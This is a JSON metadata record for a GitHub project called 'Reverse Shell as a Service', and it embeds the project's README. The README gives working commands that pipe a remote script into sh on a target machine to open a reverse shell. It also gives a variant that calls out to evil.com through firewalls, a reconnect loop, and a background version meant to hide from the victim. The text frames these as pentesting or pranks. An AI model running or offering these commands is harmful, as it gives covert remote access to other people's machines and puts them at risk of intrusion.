{"id":13402155,"url":"https://github.com/lukechilds/reverse-shell","last_synced_at":"2025-04-14T06:02:25.204Z","repository":{"id":50300132,"uuid":"103392317","full_name":"lukechilds/reverse-shell","owner":"lukechilds","description":"Reverse Shell as a Service","archived":false,"fork":false,"pushed_at":"2024-01-22T08:11:09.000Z","size":352,"stargazers_count":1885,"open_issues_count":15,"forks_count":238,"subscribers_count":30,"default_branch":"master","last_synced_at":"2025-04-07T00:16:13.859Z","etag":null,"topics":["exploit","joke","microservice","pentesting","prank","reverse-shell","vulnerability"],"latest_commit_sha":null,"homepage":"https://reverse-shell.sh","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/lukechilds.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null},"funding":{"github":["lukechilds"],"custom":["https://blockstream.info/address/1LukeQU5jwebXbMLDVydeH4vFSobRV9rkj","https://blockstream.info/address/3Luke2qRn5iLj4NiFrvLBu2jaEj7JeMR6w","https://blockstream.info/address/bc1qlukeyq0c69v97uss68fet26kjkcsrymd2kv6d4","https://tippin.me/@lukechilds"]}},"created_at":"2017-09-13T11:38:09.000Z","updated_at":"2025-04-04T03:49:45.000Z","dependencies_parsed_at":"2024-06-21T17:29:37.069Z","dependency_job_id":"27b9ed89-4bd5-45ef-ae4c-2cbb2c21b8c3","html_url":"https://github.com/lukechilds/reverse-shell","commit_stats":{"total_commits":85,"total_committers":3,"mean_commits":"28.333333333333332","dds":0.07058823529411762,"last_synced_commit":"f6d08688544d459a6617176897f6ba8d30c3f300"},"previous_names":[],"tags_count":14,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lukechilds%2Freverse-shell","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lukechilds%2Freverse-shell/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lukechilds%2Freverse-shell/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lukechilds%2Freverse-shell/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lukechilds","download_url":"https://codeload.github.com/lukechilds/reverse-shell/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248830404,"owners_count":21168272,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["exploit","joke","microservice","pentesting","prank","reverse-shell","vulnerability"],"created_at":"2024-07-30T19:01:12.147Z","updated_at":"2025-04-14T06:02:25.140Z","avatar_url":"https://github.com/lukechilds.png","language":"JavaScript","readme":"\u003cdiv align=\"center\"\u003e\n\t\u003cbr\u003e\n\t\u003ca href=\"https://reverse-shell.sh\" target=\"_blank\"\u003e\n\t\t\u003cimg width=\"128\" src=\"favicon.ico\" alt=\"keyv\"\u003e\n    \u003c/a\u003e\n\u003c/div\u003e\n\n# reverse-shell\n\n\u003e Reverse Shell as a Service - https://reverse-shell.sh\n\n[![Coverage Status](https://coveralls.io/repos/github/lukechilds/reverse-shell/badge.svg?branch=master)](https://coveralls.io/github/lukechilds/reverse-shell?branch=master)\n[![npm](https://img.shields.io/npm/v/reverse-shell.svg)](https://www.npmjs.com/package/reverse-shell)\n[![GitHub Donate](https://badgen.net/badge/GitHub/Sponsor/D959A7?icon=github)](https://github.com/sponsors/lukechilds)\n[![Bitcoin Donate](https://badgen.net/badge/Bitcoin/Donate/F19537?icon=bitcoin)](https://lu.ke/tip/bitcoin)\n[![Lightning Donate](https://badgen.net/badge/Lightning/Donate/F6BC41?icon=bitcoin-lightning)](https://lu.ke/tip/lightning)\n\nEasy to remember reverse shell that should work on most Unix-like systems.\n\nDetects available software on the target and runs an appropriate payload.\n\n## Usage\n\n### 1. Listen for connection\n\nOn your machine, open up a port and listen on it. You can do this easily with netcat.\n\n```shell\nnc -l 1337\n```\n### 2. Execute reverse shell on target\n\nOn the target machine, pipe the output of https://reverse-shell.sh/yourip:port into sh.\n\n```shell\ncurl https://reverse-shell.sh/192.168.0.69:1337 | sh\n```\n\nGo back to your machine, you should now have a shell prompt.\n\n### 3. Don't be a dick\n\nThis is meant to be used for pentesting or helping coworkers understand why they should always lock their computers. Please don't use this for anything malicious.\n\n## Demo\n\n\u003cimg src=\"https://i.imgur.com/qqjhxAw.gif\" width=\"808\"\u003e\n\n## Tips\n\n### Hostname\n\nYou can use a hostname instead of an IP.\n\n```shell\ncurl https://reverse-shell.sh/localhost:1337 | sh\n```\n\n### Remote connections\n\nBecause this is a reverse connection it can punch through firewalls and connect to the internet.\n\nYou could listen for connections on a server at evil.com and get a reverse shell from inside a secure network with:\n\n```shell\ncurl https://reverse-shell.sh/evil.com:1337 | sh\n```\n\n### Reconnecting\n\nBy default when the shell exits you lose your connection. You may do this by accident with an invalid command. You can easily create a shell that will attempt to reconnect by wrapping it in a while loop.\n\n```shell\nwhile true; do curl https://reverse-shell.sh/yourip:1337 | sh; done\n```\n\nBe careful if you do this to a coworker, if they leave the office with this still running you're opening them up to attack.\n\n### Running as a background process\n\nThe terminal session needs to be kept open to persist the reverse shell connection. That might be a bit of a giveaway if you're trying to prank coworkers.\n\nThe following command will run the reverse shell in a background process and exit the terminal, leaving no suspicious looking terminal windows open on the victim's machine.\n\nMake sure you run this in a fresh terminal window otherwise you'll lose any work in your existing session.\n\n```shell\nsh -c \"curl https://reverse-shell.sh/localhost:1337 | sh -i \u0026\" \u0026\u0026 exit\n```\n\n## License\n\nMIT © Luke Childs\n","funding_links":["https://github.com/sponsors/lukechilds","https://blockstream.info/address/1LukeQU5jwebXbMLDVydeH4vFSobRV9rkj","https://blockstream.info/address/3Luke2qRn5iLj4NiFrvLBu2jaEj7JeMR6w","https://blockstream.info/address/bc1qlukeyq0c69v97uss68fet26kjkcsrymd2kv6d4","https://tippin.me/@lukechilds"],"categories":["JavaScript","Tools","\u003ca id=\"1a9934198e37d6d06b881705b863afc8\"\u003e\u003c/a\u003e通信\u0026\u0026代理\u0026\u0026反向代理\u0026\u0026隧道","\u003ca id=\"01e6651181d405ecdcd92a452989e7e0\"\u003e\u003c/a\u003e工具","Post-exploitation","JavaScript (485)"],"sub_categories":["Webshell","\u003ca id=\"56acb7c49c828d4715dce57410d490d1\"\u003e\u003c/a\u003e未分类-Proxy","\u003ca id=\"e9f97504fbd14c8bb4154bd0680e9e62\"\u003e\u003c/a\u003e反向代理","Reverse shell"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Flukechilds%2Freverse-shell","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Flukechilds%2Freverse-shell","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Flukechilds%2Freverse-shell/lists"}